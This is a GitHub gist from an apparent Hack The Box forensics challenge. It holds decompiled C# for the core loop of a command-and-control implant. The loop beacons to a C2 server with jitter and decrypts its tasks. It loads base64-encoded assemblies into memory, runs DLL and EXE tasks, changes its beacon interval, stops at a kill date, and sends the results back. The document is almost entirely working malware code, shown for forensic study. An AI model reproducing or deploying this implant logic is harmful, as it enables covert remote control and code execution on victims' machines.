Created
March 23, 2023 18:22
-
-
Save khr0x40sh/5d5a47cb2293afba1561d5f57caab020 to your computer and use it in GitHub Desktop.
HTB:CA2023 Forensics Interstellar Implant Core C2 Function
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // Program | |
| // Token: 0x06000017 RID: 23 RVA: 0x00002CDC File Offset: 0x00000EDC | |
| private static void ImplantCore(string baseURL, string RandomURI, string stringURLS, string KillDate, string Sleep, string Key, string stringIMGS, string Jitter) | |
| { | |
| Program.UrlGen.Init(stringURLS, RandomURI, baseURL); | |
| Program.ImgGen.Init(stringIMGS); | |
| Program.pKey = Key; | |
| int num = 5; | |
| Regex regex = new Regex("(?<t>[0-9]{1,9})(?<u>[h,m,s]{0,1})", RegexOptions.IgnoreCase | RegexOptions.Compiled); | |
| Match match = regex.Match(Sleep); | |
| if (match.Success) | |
| { | |
| num = Program.Parse_Beacon_Time(match.Groups["t"].Value, match.Groups["u"].Value); | |
| } | |
| StringWriter stringWriter = new StringWriter(); | |
| Console.SetOut(stringWriter); | |
| ManualResetEvent manualResetEvent = new ManualResetEvent(false); | |
| StringBuilder stringBuilder = new StringBuilder(); | |
| double num2 = 0.0; | |
| if (!double.TryParse(Jitter, NumberStyles.Any, CultureInfo.InvariantCulture, out num2)) | |
| { | |
| num2 = 0.2; | |
| } | |
| while (!manualResetEvent.WaitOne(new Random().Next((int)((double)(num * 1000) * (1.0 - num2)), (int)((double)(num * 1000) * (1.0 + num2))))) | |
| { | |
| if (DateTime.ParseExact(KillDate, "yyyy-MM-dd", CultureInfo.InvariantCulture) < DateTime.Now) | |
| { | |
| Program.Run = false; | |
| manualResetEvent.Set(); | |
| } | |
| else | |
| { | |
| stringBuilder.Length = 0; | |
| try | |
| { | |
| string text = ""; | |
| string cmd = null; | |
| try | |
| { | |
| cmd = Program.GetWebRequest(null).DownloadString(Program.UrlGen.GenerateUrl()); | |
| text = Program.Decryption(Key, cmd).Replace("\0", string.Empty); | |
| } | |
| catch | |
| { | |
| continue; | |
| } | |
| if (text.ToLower().StartsWith("multicmd")) | |
| { | |
| string text2 = text.Replace("multicmd", ""); | |
| string[] array = text2.Split(new string[] | |
| { | |
| "!d-3dion@LD!-d" | |
| }, StringSplitOptions.RemoveEmptyEntries); | |
| foreach (string text3 in array) | |
| { | |
| Program.taskId = text3.Substring(0, 5); | |
| cmd = text3.Substring(5, text3.Length - 5); | |
| if (cmd.ToLower().StartsWith("exit")) | |
| { | |
| Program.Run = false; | |
| manualResetEvent.Set(); | |
| break; | |
| } | |
| if (cmd.ToLower().StartsWith("loadmodule")) | |
| { | |
| string s = Regex.Replace(cmd, "loadmodule", "", RegexOptions.IgnoreCase); | |
| Assembly assembly = Assembly.Load(Convert.FromBase64String(s)); | |
| Program.Exec(stringBuilder.ToString(), Program.taskId, Key, null); | |
| } | |
| else if (cmd.ToLower().StartsWith("run-dll-background") || cmd.ToLower().StartsWith("run-exe-background")) | |
| { | |
| Thread thread = new Thread(delegate() | |
| { | |
| Program.rAsm(cmd); | |
| }); | |
| Program.Exec("[+] Running background task", Program.taskId, Key, null); | |
| thread.Start(); | |
| } | |
| else if (cmd.ToLower().StartsWith("run-dll") || cmd.ToLower().StartsWith("run-exe")) | |
| { | |
| stringBuilder.AppendLine(Program.rAsm(cmd)); | |
| } | |
| else if (cmd.ToLower().StartsWith("beacon")) | |
| { | |
| Regex regex2 = new Regex("(?<=(beacon)\\s{1,})(?<t>[0-9]{1,9})(?<u>[h,m,s]{0,1})", RegexOptions.IgnoreCase | RegexOptions.Compiled); | |
| Match match2 = regex2.Match(text3); | |
| if (match2.Success) | |
| { | |
| num = Program.Parse_Beacon_Time(match2.Groups["t"].Value, match2.Groups["u"].Value); | |
| } | |
| else | |
| { | |
| stringBuilder.AppendLine(string.Format("[X] Invalid time \"{0}\"", text3)); | |
| } | |
| Program.Exec("Beacon set", Program.taskId, Key, null); | |
| } | |
| else | |
| { | |
| string text4 = Program.rAsm(string.Format("run-exe Core.Program Core {0}", cmd)); | |
| } | |
| stringBuilder.AppendLine(stringWriter.ToString()); | |
| StringBuilder stringBuilder2 = stringWriter.GetStringBuilder(); | |
| stringBuilder2.Remove(0, stringBuilder2.Length); | |
| if (stringBuilder.Length > 2) | |
| { | |
| Program.Exec(stringBuilder.ToString(), Program.taskId, Key, null); | |
| } | |
| stringBuilder.Length = 0; | |
| } | |
| } | |
| } | |
| catch (NullReferenceException ex) | |
| { | |
| } | |
| catch (WebException ex2) | |
| { | |
| } | |
| catch (Exception arg) | |
| { | |
| Program.Exec(string.Format("Error: {0} {1}", stringBuilder.ToString(), arg), "Error", Key, null); | |
| } | |
| finally | |
| { | |
| stringBuilder.AppendLine(stringWriter.ToString()); | |
| StringBuilder stringBuilder3 = stringWriter.GetStringBuilder(); | |
| stringBuilder3.Remove(0, stringBuilder3.Length); | |
| if (stringBuilder.Length > 2) | |
| { | |
| Program.Exec(stringBuilder.ToString(), "99999", Key, null); | |
| } | |
| stringBuilder.Length = 0; | |
| } | |
| } | |
| } | |
| } |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment